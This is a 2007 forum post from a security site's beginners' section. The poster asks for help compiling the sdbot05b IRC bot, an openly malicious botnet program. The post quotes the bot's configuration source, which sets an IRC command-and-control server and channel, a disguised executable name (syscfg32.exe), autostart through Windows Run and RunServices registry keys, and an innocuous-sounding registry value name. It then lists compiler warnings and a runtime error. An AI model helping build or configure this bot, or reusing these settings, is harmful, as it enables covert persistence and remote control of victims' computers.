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www.waraxe.us Forum Index -> Newbies corner -> Sdbot05b.c Help!
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Sdbot05b.c Help!
PostPosted: Fri Oct 19, 2007 10:09 pm Reply with quote
Joined: Oct 20, 2007
Posts: 3

Hey guys long time reader, first time poster.

I am trying to compile the sdbot (sdbot05b), and I am running into a few problems.

Just so we're on the same page, the source I am using I downloaded from here:

I had modified the sdbot05b.c file, with the following configuration:


// bot configuration
const char botid[] = "test"; // bot id
const char password[] = "password"; // bot password
const int maxlogins = 4; // maximum number of simultaneous logins
const char server[] = "irc.2600.net"; // server
const int port = 6667; // server port
const char serverpass[] = ""; // server password
const char channel[] = "onetwothreee"; // channel that the bot should join
const char chanpass[] = ""; // channel password
const char server2[] = ""; // backup server (optional)
const int port2 = 6667; // backup server port
const char channel2[] = ""; // backup channel (optional)
const char chanpass2[] = ""; // backup channel password (optional)
const BOOL topiccmd = FALSE; // set to TRUE to enable topic commands
const BOOL rndfilename = FALSE; // use random file name
const char filename[] = "syscfg32.exe"; // destination file name
const BOOL regrun = TRUE; // use the Run registry key for autostart
const BOOL regrunservices = TRUE; // use the RunServices registry key for autostart
const char valuename[] = "Configuration Loader"; // value name for autostart
const char prefix = '.'; // command prefix (one character max.)
const char version[] = "sdbot v0.5b by [sd]"; // bot's VERSION reply
const int cryptkey = 0; // encryption key (not used right now)
const int maxaliases = 16; // maximum number of aliases (must be greater than the number of predefined aliases).

I then compiled (tried compiling on Windows XP, Server 2003) with the included .bat file using lcc (latest window version). The sdbot05b.exe does get created, but has two errors.

Warning sdbot05b.c: 2008 Missing prototype for 'cyclecount'
Warning sdbot05b.c: 2010 Missing prototype for 'cyclecount'
0 errors, 2 warnings
cannot open sdbot05b.obj

Dispite the error I still try running on my VM running XP Pro (2600 Build), and get a pop up with the following error

Sdbot05b.exe The NTVDM CPU has encountered an illegal instruction. CS:0dcd IP:001d OP:ff ff ff ff ff Choose 'close' to terminate the application

Any help would be greatly appreciated. Thanks in advance.
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Sdbot05b.c Help!
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